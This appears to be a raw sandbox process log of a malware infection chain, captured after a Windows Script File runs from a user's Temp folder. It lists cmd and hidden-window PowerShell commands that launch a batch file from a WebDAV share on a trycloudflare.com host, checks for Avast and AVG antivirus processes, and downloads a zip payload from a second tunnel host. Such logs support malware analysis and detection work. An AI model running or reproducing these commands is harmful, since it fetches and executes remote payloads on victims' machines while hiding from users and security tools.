wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\385383af03411274e379b46225321720a2529632df19a9430ede49ec198fcb91.wsf
2548cmd.exe "C:\Windows\System32\cmd.exe" /c start /min \\booty-act-kijiji-armed.trycloudflare.com@SSL\DavWWWRoot\try.bat
2628powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\booty-act-kijiji-armed.trycloudflare.com@SSL\DavWWWRoot\try.bat\" hidden' -WindowStyle Hidden"
2944cmd.exe "C:\Windows\system32\cmd.exe" /c "\\booty-act-kijiji-armed.trycloudflare.com@SSL\DavWWWRoot\try.bat" hidden
3044tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
2080find.exe find /i "AvastUI.exe"
2104tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
2244find.exe find /i "avgui.exe"
2268powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://kuwait-validity-stranger-partner.trycloudflare.com/bab.zip' -OutFile 'C:\Users\test22\Downloads\downloaded.zip' } catch { exit 1 }"
2484